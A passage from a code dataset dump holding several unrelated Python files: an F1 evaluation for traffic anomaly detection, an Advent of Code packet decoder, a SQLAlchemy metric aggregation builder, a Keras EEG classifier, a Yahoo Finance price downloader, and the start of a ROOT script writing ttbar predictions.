for i in range(len(our_error_lines)):\r\n message1 = our_error_lines[i].split(',')\r\n road_id = int(message1[0])\r\n time1 = message1[1]\r\n message2 = data_lines[road_id].split(',')\r\n road_osm1 = message2[0]\r\n road_osm2 = message2[1]\r\n X1,Y1 = get_lat_lon(road_osm1, lonlat_dict)\r\n X2,Y2 = get_lat_lon(road_osm2, lonlat_dict)\r\n for j in range(len(test_line)):\r\n message3 = test_line[j].split(',')\r\n time2 = message3[0].split(':')[0]\r\n X0 = float(message3[2])\r\n Y0 = float(message3[3])\r\n distance1 = cal_distance_meter(X0,Y0,X1,Y1)\r\n distance2 = cal_distance_meter(X0,Y0,X2,Y2)\r\n if judge_dis(distance1,distance2) and judge_time(time1,time2):\r\n TP1 += 1\r\n wrongset.add(j)\r\n\r\n TP2 = len(wrongset)\r\n P = TP1 / len(our_error_lines)\r\n R = TP2 / len(test_line)\r\n F1 = 2*P*R/(P+R)\r\n return F1, TP1, TP2, P, R\r\n\r\ndef show_matrix(mt):\r\n ax=plt.subplot(111,projection='3d') \r\n for i in range(len(mt)):\r\n for j in range(len(mt[0])):\r\n value = mt[i][j] \r\n ax.scatter(i, j, mt[i][j] ,c=\"r\")\r\n plt.show()\r\n\r\ndef get_b_s(filename):\r\n names = filename.split(',')\r\n return int(names[0][-1:]), int(names[1].split('.')[0])\r\n\r\ndef real_run():\r\n root_dir = './data/result1'\r\n filelist = os.listdir(root_dir)\r\n \r\n best_F1 = 0\r\n F1_matrix = [[0 for col in range(10)]for row in range(9)]\r\n\r\n for filename in filelist:\r\n filepath = os.path.join(root_dir, filename)\r\n F1, TP1, TP2, P, R = cal_f1(filepath)\r\n beta, suppose = get_b_s(filename)\r\n print(' beta = ', beta, 'sup = ', suppose)\r\n print(' F1:', F1)\r\n print(' TP1:', TP1)\r\n print(' TP2:', TP2)\r\n print(' P:', P)\r\n print(' R:', R)\r\n \r\n\r\n #save it to matrix 1-9 1-10 (9*10)\r\n \r\n F1_matrix[int(beta)-1][int(suppose)-1] = F1\r\n\r\n if F1 > best_F1:\r\n best_F1 = F1\r\n best_beta = beta\r\n best_suppose = suppose\r\n best_TP1 = TP1\r\n best_TP2 = TP2\r\n best_P = P\r\n best_R = R\r\n\r\n print('-----best result-----') \r\n print(' beta:', best_beta, ' suppose:', best_suppose)\r\n print(' F1 =', best_F1)\r\n print(' TP1:', best_TP1)\r\n print(' TP2:', best_TP2)\r\n print(' P:', best_P)\r\n print(' R:', best_R)\r\n\r\n show_matrix(F1_matrix)\r\n return\r\n\r\ndef real_run_one():\r\n #root_dir = './result'\r\n #filelist = os.listdir(root_dir)\r\n root_dir = './data/result'\r\n filelist = os.listdir(root_dir)\r\n\r\n filename = filelist[0]\r\n filepath = os.path.join(root_dir, filename)\r\n \r\n best_F1 = 0\r\n #F1_matrix = [[0 for col in range(10)]for row in range(9)]\r\n\r\n #for filename in filelist:\r\n #filepath = os.path.join(root_dir, filename)\r\n F1, TP1, TP2, P, R = cal_f1(filepath)\r\n #beta, suppose = get_b_s(filename)\r\n beta, suppose =2,6\r\n print(' beta = ', beta, 'sup = ', suppose)\r\n print(' F1:', F1)\r\n print(' TP1:', TP1)\r\n print(' TP2:', TP2)\r\n print(' P:', P)\r\n print(' R:', R)\r\n \r\n\r\n #save it to matrix 1-9 1-10 (9*10)\r\n \r\n #F1_matrix[int(beta)-1][int(suppose)-1] = F1\r\n\r\n if F1 > best_F1:\r\n best_F1 = F1\r\n best_beta = beta\r\n best_suppose = suppose\r\n best_TP1 = TP1\r\n best_TP2 = TP2\r\n best_P = P\r\n best_R = R\r\n\r\n print('-----best result-----') \r\n print(' beta:', best_beta, ' suppose:', best_suppose)\r\n print(' F1 =', best_F1)\r\n print(' TP1:', best_TP1)\r\n print(' TP2:', best_TP2)\r\n print(' P:', best_P)\r\n print(' R:', best_R)\r\n\r\n #show_matrix(F1_matrix)\r\n return\r\n\r\n\r\ndef run():\r\n real_flag = 2\r\n if real_flag == 1:\r\n real_run()\r\n elif real_flag == 2:\r\n real_run_one()\r\n else:\r\n #do some test here and set real_flag = False\r\n ax=plt.subplot(111,projection='3d') \r\n ax.scatter(1, 2, 3 ,c=\"r\")\r\n ax.scatter(5, 7, 9 ,c=\"r\")\r\n plt.show()\r\n \r\n\r\n\r\n#beta = 1\r\n#suppose = 1\r\n\r\n#for i in range(9):\r\n #for j in range(10):\r\n #print()\r\n #result = ...\r\n #np.savetxt(\"....../result\" + '.' + beta + '.' + suppose +'.txt',......)\r\n #suppose += 1\r\n #beta += 1\r\n","repo_name":"PengFCB/Traffic_Anomaly_Detection_System_UCAS","sub_path":"cal_f1/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5905,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"24312514867","text":"import sys\nimport numpy\n\nVERSION_LENGTH = 3\nTYPE_LENGTH = 3\nID_INDEX = 6\nSUB_PACKETS_LENGTH = 15\nADDITIONAL_INFO_START_INDEX = 7\nSUB_PACKETS_NUMBER = 11\n\nhex_dic = {\n \"0\": \"0000\",\n \"1\": \"0001\",\n \"2\": \"0010\",\n \"3\": \"0011\",\n \"4\": \"0100\",\n \"5\": \"0101\",\n \"6\": \"0110\",\n \"7\": \"0111\",\n \"8\": \"1000\",\n \"9\": \"1001\",\n \"A\": \"1010\",\n \"B\": \"1011\",\n \"C\": \"1100\",\n \"D\": \"1101\",\n \"E\": \"1110\",\n \"F\": \"1111\"\n}\n\ndef get_result_from_subpackets(values, operation_code):\n\n if operation_code == 0:\n return numpy.sum(values)\n if operation_code == 1:\n return numpy.prod(values)\n if operation_code == 2:\n return min(values)\n if operation_code == 3:\n return max(values)\n if operation_code == 5:\n if len(values) != 2:\n raise\n return int(values[0] > values[1])\n if operation_code == 6:\n if len(values) != 2:\n raise\n return int(values[0] < values[1])\n if operation_code == 7:\n if len(values) != 2:\n raise\n return int(values[0] == values[1])\n\n \n# Returns value and lenght\ndef parse_literal_packet(packet):\n\n is_last_group = False\n sub_group_start_index = (VERSION_LENGTH + TYPE_LENGTH)\n binary_string = \"\"\n \n while not is_last_group:\n \n sub_group_start_bit = packet[sub_group_start_index]\n if sub_group_start_bit == \"0\":\n is_last_group = True\n \n binary_string += packet[sub_group_start_index + 1: sub_group_start_index + 5]\n sub_group_start_index += 5\n \n decimal_number = int(binary_string, 2)\n return (decimal_number, sub_group_start_index)\n \ndef parse_operator_packet(packet):\n \n operation_code = int(packet[VERSION_LENGTH: VERSION_LENGTH + TYPE_LENGTH], 2)\n print(\"operator code\", operation_code)\n length_id = packet[ID_INDEX]\n\n if length_id == \"0\":\n print(\"length id 0\")\n sub_packets_len = get_sub_packets_length(packet)\n print(\"sub packet len\", sub_packets_len)\n packets_start_index = (ADDITIONAL_INFO_START_INDEX + SUB_PACKETS_LENGTH)\n result, length = parse_bits_delimited_packets(packet[packets_start_index:], sub_packets_len, operation_code)\n return (result, length + packets_start_index)\n \n \n elif length_id == \"1\":\n print(\"length id 1\")\n sub_packets_num = get_sub_packets_number(packet)\n print(\"length\", sub_packets_num)\n packets_start_index = (ADDITIONAL_INFO_START_INDEX + SUB_PACKETS_NUMBER)\n result, length = parse_number_delimited_packets(packet[packets_start_index:], sub_packets_num, operation_code)\n return (result, length + packets_start_index)\n\n else:\n raise\n\ndef get_sub_packets_number(packet):\n number = packet[ADDITIONAL_INFO_START_INDEX: ADDITIONAL_INFO_START_INDEX + SUB_PACKETS_NUMBER]\n return int(number, 2)\n\ndef get_sub_packets_length(packet):\n number = packet[ADDITIONAL_INFO_START_INDEX: ADDITIONAL_INFO_START_INDEX + SUB_PACKETS_LENGTH]\n return int(number, 2)\n\n#returns value_sum and length\ndef parse_number_delimited_packets(packets, number_of_packets, operation_code):\n\n packet_number = 0\n packet_start_index = 0\n sub_values = []\n\n while packet_number < number_of_packets:\n \n print(\"parse packet\", packet_number)\n packet_number += 1\n type = packets[packet_start_index + VERSION_LENGTH: packet_start_index + VERSION_LENGTH + TYPE_LENGTH]\n print(\"typee\", type)\n \n if type == \"100\":\n literal_number, literal_length = parse_literal_packet(packets[packet_start_index:])\n packet_start_index += literal_length\n sub_values.append(literal_number)\n \n else:\n operator_result, operator_length = parse_operator_packet(packets[packet_start_index:])\n sub_values.append(operator_result)\n packet_start_index += operator_length\n \n result = get_result_from_subpackets(sub_values, operation_code)\n \n return (result, packet_start_index)\n\ndef parse_bits_delimited_packets(packets, packets_len, operation_code):\n\n print(\"packets\", packets)\n packet_start_index = 0\n sub_values = []\n \n while packet_start_index < packets_len:\n \n type = packets[packet_start_index + VERSION_LENGTH: packet_start_index + VERSION_LENGTH + TYPE_LENGTH]\n print(\"type\", type)\n \n if type == \"100\":\n literal_value, literal_length = parse_literal_packet(packets[packet_start_index:])\n sub_values.append(literal_value)\n packet_start_index += literal_length\n print(\"literal length\", literal_length)\n \n else:\n operator_result, operator_length = parse_operator_packet(packets[packet_start_index:])\n sub_values.append(operator_result)\n packet_start_index += operator_length\n \n \n result = get_result_from_subpackets(sub_values, operation_code)\n return (result, packet_start_index)\n \n \ndef solution_2(packet):\n\n version = packet[0:VERSION_LENGTH]\n type = packet[VERSION_LENGTH: VERSION_LENGTH + TYPE_LENGTH]\n \n if type == \"100\":\n return int(version, 2)\n \n else:\n operator_version, _ = parse_operator_packet(packet)\n return operator_version\n\n\ndef convert_to_binary(input):\n input_len = len(input)\n binary_string = \"\"\n \n for hex in input:\n binary_string += hex_dic[hex]\n return binary_string\n \ndef main():\n if len(sys.argv) < 2:\n print(\"missing args\")\n return\n \n filename = sys.argv[1]\n f = open(filename, \"r\")\n line = f.readlines()[0]\n converted_input = convert_to_binary(line)\n print(\"converted input\", converted_input)\n print(solution_2(converted_input))\n\nmain()\n\n\n","repo_name":"lauracorssac/AdventOfCode2021","sub_path":"16/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":5875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25795307298","text":"from typing import Dict, List, Optional\n\nimport sqlalchemy\nfrom sqlalchemy import cast, func, union_all\nfrom sqlalchemy.sql import Select\nfrom sqlalchemy.sql.elements import ColumnClause, literal_column\n\nfrom panoramic.cli.husky.core.sql_alchemy_util import (\n AGGREGATION_TYPE_TO_SQLALCHEMY_FN,\n safe_identifier,\n safe_quote_identifier,\n sort_columns,\n)\nfrom panoramic.cli.husky.core.taxonomy.enums import AggregationType\nfrom panoramic.cli.husky.service.blending.blending_taxon_manager import (\n BlendingTaxonManager,\n)\nfrom panoramic.cli.husky.service.context import HuskyQueryContext\nfrom panoramic.cli.husky.service.filter_builder.component import FilterBuilder\nfrom panoramic.cli.husky.service.filter_builder.filter_clauses import FilterClause\nfrom panoramic.cli.husky.service.select_builder.taxon_model_info import TaxonModelInfo\nfrom panoramic.cli.husky.service.types.api_data_request_types import GroupingSets\nfrom panoramic.cli.husky.service.types.types import Dataframe, DataframeColumn\n\n_PANORAMIC_GROUPINGSETS_NULL = 'PANORAMIC_GROUPINGSETS_NULL'\n\n\nclass MetricPhaseBuilder:\n\n AGGREGATION_FUNCTIONS_MAP: Dict[AggregationType, func.Function] = {\n AggregationType.sum: AGGREGATION_TYPE_TO_SQLALCHEMY_FN[AggregationType.sum],\n AggregationType.count_all: AGGREGATION_TYPE_TO_SQLALCHEMY_FN[AggregationType.sum],\n AggregationType.count_distinct: AGGREGATION_TYPE_TO_SQLALCHEMY_FN[AggregationType.sum],\n }\n \"\"\"\n Map of specific aggregation functions to SQL functions in this phase\n \"\"\"\n\n def __init__(self, taxon_manager: BlendingTaxonManager):\n self.taxon_manager = taxon_manager\n\n def calculate_dataframe(\n self,\n ctx: HuskyQueryContext,\n df: Dataframe,\n grouping_sets: Optional[GroupingSets] = None,\n filter_clause: Optional[FilterClause] = None,\n ) -> Dataframe:\n \"\"\"\n Applies in this order:\n - pre aggregation logic\n - aggregation by group by or grouping sets\n - optional step of window function aggregation\n - after aggregation logic\n - filters. Filters are applied here to simplify the final query and apply filtering before filling date gaps.\n \"\"\"\n pre_agg_columns = [] # Columns with applied aggregation function in aggregation step\n\n # Columns to select from window step - columns that are not removed and dont need window step\n select_from_window_step: List[ColumnClause] = []\n df_columns: List[DataframeColumn] = [] # Final df columns after all steps.\n group_columns = []\n final_columns: List[ColumnClause] = []\n for pre_formula in self.taxon_manager.plan.metric_pre:\n col = pre_formula.formula.label(pre_formula.label)\n aggregation_fn = self.AGGREGATION_FUNCTIONS_MAP.get(pre_formula.aggregation.type)\n\n if aggregation_fn:\n # we know the aggregation function so let's use it\n pre_agg_columns.append(aggregation_fn(col).label(pre_formula.label))\n else:\n # if no aggregation function is defined, then we simply group by this formula\n group_columns.append(col)\n\n select_from_window_step.append(col)\n\n # taxon slugs used in group by clause\n dimension_taxon_slugs = {group_column.name for group_column in group_columns}\n\n for post_formula, taxon in self.taxon_manager.plan.metric_post:\n post_formula_sql = post_formula.render_formula(ctx.dialect, dimension_taxon_slugs)\n col = post_formula_sql.label(taxon.slug_safe_sql_identifier)\n final_columns.append(col)\n df_columns.append(DataframeColumn(taxon.slug_expr, taxon))\n\n # Aggregation query with column logic. This is the first aggregation step, regular group by\n # or a common table expression with multiple group by statements in case of grouping sets.\n pre_query = self._add_aggregation(df.query, pre_agg_columns, group_columns, grouping_sets)\n\n # Post aggregation logic\n post_query = Select(columns=sort_columns(final_columns)).select_from(pre_query)\n\n slug_to_column = Dataframe.dataframe_columns_to_map(df_columns)\n if filter_clause:\n taxon_model_info = {\n str(slug): TaxonModelInfo(safe_quote_identifier(slug, ctx.dialect)) for slug in slug_to_column.keys()\n }\n post_query = FilterBuilder.augment_query(ctx, post_query, taxon_model_info, filter_clause)\n\n return Dataframe(post_query, slug_to_column, df.used_model_names)\n\n @classmethod\n def _add_aggregation(\n cls,\n inner_query: Select,\n aggregation_columns: List[ColumnClause],\n group_by_columns: List[ColumnClause],\n grouping_sets: Optional[GroupingSets] = None,\n ) -> Select:\n \"\"\"\n Aggregates raw metric taxons. Groups by given dimension taxons or grouping sets.\n\n :param inner_query: Query to aggregate\n :param aggregation_columns: List of columns with applied aggregation function\n :param group_by_columns: List of columns to group by\n :param grouping_sets: Optional list of grouping sets to group by instead\n :return: Aggregated query\n \"\"\"\n if grouping_sets:\n # Because we union _PANORAMIC_GROUPINGSETS_NULL with column that can be date(time) or number,\n # we must cast all group columns to text. Some DB engines fail when we do casting and grouping in one query,\n # thus here we need to stringify the group columns in the CTE, and not in the group by query just below...\n group_by_column_names = {col.name for col in group_by_columns}\n stringified_group_columns = []\n for col in inner_query.columns:\n if col.name in group_by_column_names:\n stringified_group_columns.append(cast(col, sqlalchemy.VARCHAR).label(col.name))\n else:\n stringified_group_columns.append(col)\n\n # common table expression reused by multiple grouping sets queries\n cte_query = (\n Select(columns=sort_columns(stringified_group_columns))\n .select_from(inner_query)\n .cte('__cte_grouping_sets')\n )\n grouping_sets_queries = []\n\n for grouping_set in grouping_sets:\n safe_grouping_set = [safe_identifier(col) for col in grouping_set]\n # dimensions in the grouping set, used to aggregate values with group by\n gs_group_columns = [col for col in group_by_columns if col.name in safe_grouping_set]\n # extra dimensions not in the grouping set, returned as custom null values\n gs_null_columns = [\n literal_column(f\"'{_PANORAMIC_GROUPINGSETS_NULL}'\").label(col.name)\n for col in group_by_columns\n if col.name not in safe_grouping_set\n ]\n grouping_sets_queries.append(\n Select(columns=sort_columns(gs_group_columns + gs_null_columns + aggregation_columns))\n .select_from(cte_query)\n .group_by(*sort_columns(gs_group_columns))\n )\n return union_all(*grouping_sets_queries)\n\n # If grouping sets are not defined, use all dimensions for grouping.\n return (\n Select(columns=sort_columns(group_by_columns + aggregation_columns))\n .select_from(inner_query)\n .group_by(*sort_columns(group_by_columns))\n )\n","repo_name":"panoramichq/panoramic-cli","sub_path":"src/panoramic/cli/husky/service/blending/metric_phase_builder.py","file_name":"metric_phase_builder.py","file_ext":"py","file_size_in_byte":7615,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"3905462014","text":"import sys\nimport numpy\nimport h5py\nimport tensorflow as tf\nimport tensorflow.keras as keras\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nfrom keras.callbacks import ModelCheckpoint\nnumpy.set_printoptions(threshold=sys.maxsize, suppress=True)\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth=True\nsess = tf.Session(config=config)\nfrom keras import backend as K\nK.set_session(sess)\nimport datetime\n\n\n\n\ndef plot_value_array(i, predictions_array, true_label):\n # Function To Print Graph Displaying Probablillity\n predictions_array, true_label = predictions_array[i], true_label[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n thisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\n plt.ylim([0, 1])\n predicted_label = np.argmax(predictions_array)\n\n thisplot[predicted_label].set_color('red')\n thisplot[true_label].set_color('blue')\n\n\ndef get_dataset(filename):\n # Load Dataset From File\n hf = h5py.File(filename, 'r')\n all_data = np.zeros([100, 5, 3])\n for i in hf:\n data = hf[i][:]\n all_data = np.concatenate((all_data, data), axis=0)\n\n all_data[:, :, 2] = (keras.utils.normalize(all_data[:, :, 2], order=2))\n return all_data\n\n\ndef separate_data(all_data):\n # Separate between Data & Labels\n labels = (all_data[:, :1, :1]).flatten()\n data_only = all_data[:, :, 1:]\n return data_only, labels\n\n\ndef create_model():\n # Create New Model\n model = keras.Sequential([\n keras.layers.Flatten(input_shape=(5, 2)),\n keras.layers.Dense(25, activation=tf.nn.relu),\n keras.layers.Dense(50, activation=tf.nn.softmax),\n\tkeras.layers.Dense(50),\n keras.layers.Dense(50, activation=tf.nn.sigmoid)\n ])\n\n model.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n return model\n\n\ndef train_model(model, data_only, labels, epochs):\n filepath = \"weights/weights-improvement-{epoch:02d}-{val_acc:.2f}.hdf5\"\n logdir = \"logs/scalars/\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tensorboard_callback = keras.callbacks.TensorBoard(log_dir=logdir)\n checkpoint = ModelCheckpoint(filepath, monitor='val_acc', verbose=1, save_best_only=True, mode='max')\n callbacks_list = [checkpoint, tensorboard_callback]\n model.fit(data_only, labels, epochs=epochs, callbacks=callbacks_list, batch_size=104, validation_split=0.20,\n verbose=1)\n model.save('model.h5')\n return model\n\n\ndef plot_model(predictions_single, labels):\n plot_value_array(0, predictions_single, labels.astype(int))\n plt.xticks(range(3), ['red', 'white', 'blue'], rotation=45)\n plt.show()\n\n\ndef load_existing_model(filename):\n model = keras.models.load_model(filename)\n return model\n\n\ndef make_prediction(model, data_only, i):\n test = (np.expand_dims(data_only[i], 0))\n predictions_single = model.predict(test)\n prediction_result = np.argmax(predictions_single[0])\n print(int(prediction_result))\n\n\ndef make_random_prediction(model, data_only, labels):\n randnum = random.randint(100, 1100)\n test = (np.expand_dims(data_only[randnum], 0))\n predictions_single = model.predict(test)\n prediction_result = np.argmax(predictions_single[0])\n print(prediction_result, labels[randnum])\n\n\ndef default_action():\n all_data = get_dataset('data.h5')\n data_only, labels = separate_data(all_data)\n model = load_existing_model('model.h5')\n train_model(model, data_only, labels, 10000)\n","repo_name":"matthew-graves/eeg-muse-ai","sub_path":"brain_lib.py","file_name":"brain_lib.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23811227860","text":"import sys\n\nsys.path.insert(0, \"D:/Users/masoodw/ML_FINANCE/\")\n\nfrom multiprocessing.dummy import Pool as ThreadPool\nimport pandas as pd\nimport requests\nimport arrow\nimport datetime\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\n#from pandas_datareader._utils import RemoteDataError\n\n\n##########################################################################################\ndef unix_time_millis(dt):\n epoch = datetime.datetime.utcfromtimestamp(0)\n return int((dt - epoch).total_seconds())\n\n\n##########################################################################################\n'''interval one of [1m, 2m, 5m, 15m, 30m, 60m, 90m, 1h, 1d, 5d, 1wk, 1mo, 3mo]'''\n\n\ndef get_yahoo_symbol_snapshot(symbol='SBIN.NS', data_range='5m', data_interval='1d'):\n # print('pulling symbol:' + symbol)\n session = requests.Session()\n retry = Retry(connect=10, backoff_factor=0.3)\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n session.mount('https://', adapter)\n\n try:\n conn_url = 'https://query1.finance.yahoo.com/v8/finance/chart/{symbol}?range={data_range}&interval={data_interval}'. \\\n format(**locals())\n\n res = session.get(conn_url)\n if res.status_code != 200:\n return None\n\n data = res.json()\n except requests.ConnectionError as e:\n print(\"OOPS!! Connection Error.\")\n pass\n\n if data['chart']['result'] is None:\n return None\n\n body = data['chart']['result'][0]\n\n if 'timestamp' not in body:\n return None\n\n dt = datetime.datetime\n dt = pd.Series(map(lambda x: arrow.get(x).to('Europe/Vienna').datetime.replace(tzinfo=None), body['timestamp']),\n name='Datetime')\n df = pd.DataFrame(body['indicators']['quote'][0], index=dt)\n dg = pd.DataFrame(body['timestamp'])\n df = df.rename(columns={\"open\": \"Open\", \"close\": \"Close\", \"high\": \"High\", \"low\": \"Low\", 'volume': 'Volume'})\n df_adj = pd.DataFrame(body['indicators']['adjclose'][0], index=dt)\n df['Datetime'] = df.index\n df['Adj_Close'] = df_adj['adjclose']\n df['Symbol'] = symbol\n df = df.reset_index(drop=True)\n return df.loc[:, ('Datetime', 'Open', 'High', 'Low', 'Close', 'Volume', 'Symbol', 'Adj_Close')]\n\n\n\n##########################################################################################\n\ndef get_yahoo_symbol_history(symbol=None, start_date=None, end_date=None, data_interval='1d'):\n period_from = unix_time_millis(datetime.datetime.strptime(start_date, '%Y-%m-%d'))\n period_to = unix_time_millis(datetime.datetime.strptime(end_date, '%Y-%m-%d'))\n\n session = requests.Session()\n retry = Retry(connect=10, backoff_factor=0.3)\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n session.mount('https://', adapter)\n\n try:\n conn_url = 'https://query1.finance.yahoo.com/v8/finance/chart/{symbol}?\\\n &period1={period_from}&period2={period_to}&interval={data_interval}'.format(**locals())\n\n res = session.get(conn_url)\n if res.status_code != 200:\n return None\n\n data = res.json()\n except requests.ConnectionError as e:\n print(\"OOPS!! Connection Error.\")\n pass\n\n body = data['chart']['result'][0]\n\n if 'timestamp' not in body:\n return None\n\n dt = datetime.datetime\n dt = pd.Series(map(lambda x: arrow.get(x).to('Europe/Vienna').datetime.replace(tzinfo=None), body['timestamp']),\n name='Datetime')\n df = pd.DataFrame(body['indicators']['quote'][0], index=dt)\n dg = pd.DataFrame(body['timestamp'])\n df = df.rename(columns={\"open\": \"Open\", \"close\": \"Close\", \"high\": \"High\", \"low\": \"Low\", 'volume': 'Volume'})\n df_adj = pd.DataFrame(body['indicators']['adjclose'][0], index=dt)\n df['Datetime'] = df.index\n df['Adj_Close'] = df_adj['adjclose']\n df['Symbol'] = symbol\n df=df.reset_index(drop=True)\n return df.loc[:, ('Datetime', 'Open', 'High', 'Low', 'Close', 'Volume', 'Symbol', 'Adj_Close')]\n\n\ndef get_price_history(symbol):\n df_history = pd.DataFrame()\n dt_start = '2015-01-01'\n dt_end = '2020-05-09'\n try:\n print('Pulling: ' + symbol + ' dates:'+dt_start + '-' + dt_end)\n df_history = get_yahoo_symbol_history(symbol, dt_start, dt_end, '1d')\n if df_history is None:\n return None\n df_history['Symbol'] = symbol\n except e:\n print('Error:' + e)\n pass\n return df_history\n\n\ndef extract_indices_history(symbol_list):\n print(symbol_list)\n # Run with Multi threading\n pool = ThreadPool(500)\n # Open the urls in their own threads and return the results\n results = pd.concat(pool.map(get_price_history, symbol_list))\n # Close the pool and wait for the work to finish\n pool.close()\n pool.join()\n print('Symbols' + str(results['Symbol'].nunique()))\n print('Coverage %' + str((results['Symbol'].nunique() / results.shape[0]) * 100))\n print('Total records:' + str(results.shape))\n return results\n\ndef extract_index_history(symbol, dt_start, dt_end):\n df_history = pd.DataFrame()\n try:\n print('Pulling: ' + symbol + ' dates:'+dt_start + '-' + dt_end)\n df_history = get_yahoo_symbol_history(symbol, dt_start, dt_end, '1d')\n if df_history is None:\n return None\n df_history['Symbol'] = symbol\n except RemoteDataError:\n print('Symbol Not Found:' + symbol)\n pass\n return df_history\n\n","repo_name":"wasifmasood/STOCKS","sub_path":"packages/.ipynb_checkpoints/price_history-checkpoint.py","file_name":"price_history-checkpoint.py","file_ext":"py","file_size_in_byte":5521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7004188560","text":"#!/usr/bin/env python\nfrom ROOT import *\nimport numpy as np\nfrom AngryTops.features import *\nimport array\nimport pickle\nfrom AngryTops.Plotting.identification_helper import MakeP4, undo_scaling\n\n# write to tree file\n\n################################################################################\n# CONSTANTS\ntraining_dir = \"../CheckPoints/Summer/May21/\"\noutput_dir = \"../CheckPoints/Summer/May21/\"\nrepresentation = \"pxpypzEM\"\nscaling = True # whether the dataset has been passed through a scaling function or not\n\nm_t = 172.5\nm_W = 80.4\nm_b = 4.95\n\nALL = 0\nNONE = 1\nONLY = 2\nb_tagging = NONE \n\n################################################################################\n# load data\n\nprint(\"INFO: fitting ttbar decay chain...\")\npredictions = np.load(training_dir + 'predictions.npz')\njets = predictions['input']\ntrue = predictions['true']\nfitted = predictions['pred']\n\nparticles_shape = (true.shape[1], true.shape[2])\nprint(\"jets shape\", jets.shape)\nprint(\"b tagging option\", b_tagging)\nif scaling:\n scaler_filename = training_dir + \"scalers.pkl\"\n with open( scaler_filename, \"rb\" ) as file_scaler:\n jets_scalar = pickle.load(file_scaler)\n lep_scalar = pickle.load(file_scaler)\n output_scalar = pickle.load(file_scaler)\n\n jets_jets, jets_lep, true, fitted = undo_scaling(jets_scalar, lep_scalar, output_scalar, jets, true, fitted)\n\n\nif not scaling:\n jets_lep = jets[:,:6]\n jets_jets = jets[:,6:]\n jets_jets = jets_jets.reshape((jets_jets.shape[0],5,6))\n jets_jets = np.delete(jets_jets, 5, 2)\n\n# jets\njet_mu = jets_lep\n# First jet for every event\njet_1 = jets_jets[:,0]\n# Second jet for every event\njet_2 = jets_jets[:,1]\njet_3 = jets_jets[:,2]\njet_4 = jets_jets[:,3]\njet_5 = jets_jets[:,4]\n# Create an array with each jet's arrays for accessing b-tagging states later.\njet_list = np.stack([jet_1, jet_2, jet_3, jet_4, jet_5]) \n\n# truth\ny_true_W_had = true[:,0,:]\ny_true_W_lep = true[:,1,:]\ny_true_b_had = true[:,2,:]\ny_true_b_lep = true[:,3,:]\ny_true_t_had = true[:,4,:]\ny_true_t_lep = true[:,5,:]\n\n# fitted\ny_fitted_W_had = fitted[:,0,:]\ny_fitted_W_lep = fitted[:,1,:]\ny_fitted_b_had = fitted[:,2,:]\ny_fitted_b_lep = fitted[:,3,:]\ny_fitted_t_had = fitted[:,4,:]\ny_fitted_t_lep = fitted[:,5,:]\n\n# store number of events as a separate variable for clarity\nn_events = true.shape[0]\nw = 1\nprint(\"INFO ...done\")\n\nofilename = \"{}/predictions_May21.root\".format(output_dir)\n# Open output file\nofile = TFile.Open( ofilename, \"recreate\" )\nofile.cd()\n\nb_jet1_px_obs = array.array( 'f', [ -1.] )\nb_jet1_py_obs = array.array( 'f', [ -1.] )\nb_jet1_pz_obs = array.array( 'f', [ -1.] )\nb_jet1_pt_obs = array.array( 'f', [ -1.] )\nb_jet1_E_obs = array.array( 'f', [ -1.] )\nb_jet1_m_obs = array.array( 'f', [ -1.] )\nb_jet1_btag_obs = array.array( 'f', [ -1.] )\nb_jet2_px_obs = array.array( 'f', [ -1.] )\nb_jet2_py_obs = array.array( 'f', [ -1.] )\nb_jet2_pz_obs = array.array( 'f', [ -1.] )\nb_jet2_pt_obs = array.array( 'f', [ -1.] )\nb_jet2_E_obs = array.array( 'f', [ -1.] )\nb_jet2_m_obs = array.array( 'f', [ -1.] )\nb_jet2_btag_obs = array.array( 'f', [ -1.] )\nb_jet3_px_obs = array.array( 'f', [ -1.] )\nb_jet3_py_obs = array.array( 'f', [ -1.] )\nb_jet3_pz_obs = array.array( 'f', [ -1.] )\nb_jet3_pt_obs = array.array( 'f', [ -1.] )\nb_jet3_E_obs = array.array( 'f', [ -1.] )\nb_jet3_m_obs = array.array( 'f', [ -1.] )\nb_jet3_btag_obs = array.array( 'f', [ -1.] )\nb_jet4_px_obs = array.array( 'f', [ -1.] )\nb_jet4_py_obs = array.array( 'f', [ -1.] )\nb_jet4_pz_obs = array.array( 'f', [ -1.] )\nb_jet4_pt_obs = array.array( 'f', [ -1.] )\nb_jet4_E_obs = array.array( 'f', [ -1.] )\nb_jet4_m_obs = array.array( 'f', [ -1.] )\nb_jet4_btag_obs = array.array( 'f', [ -1.] )\nb_jet5_px_obs = array.array( 'f', [ -1.] )\nb_jet5_py_obs = array.array( 'f', [ -1.] )\nb_jet5_pz_obs = array.array( 'f', [ -1.] )\nb_jet5_pt_obs = array.array( 'f', [ -1.] )\nb_jet5_E_obs = array.array( 'f', [ -1.] )\nb_jet5_m_obs = array.array( 'f', [ -1.] )\nb_jet5_btag_obs = array.array( 'f', [ -1.] )\nb_jetmu_px_obs = array.array( 'f', [ -1.] )\nb_jetmu_py_obs = array.array( 'f', [ -1.] )\nb_jetmu_pz_obs = array.array( 'f', [ -1.] )\nb_jetmu_T0_obs = array.array( 'f', [ -1.] )\nb_jetlep_ET_obs = array.array( 'f', [ -1.] )\nb_jetlep_phi_obs = array.array( 'f', [ -1.] )\n\nb_W_had_px_true = array.array( 'f', [ -1.] )\nb_W_had_py_true = array.array( 'f', [ -1.] 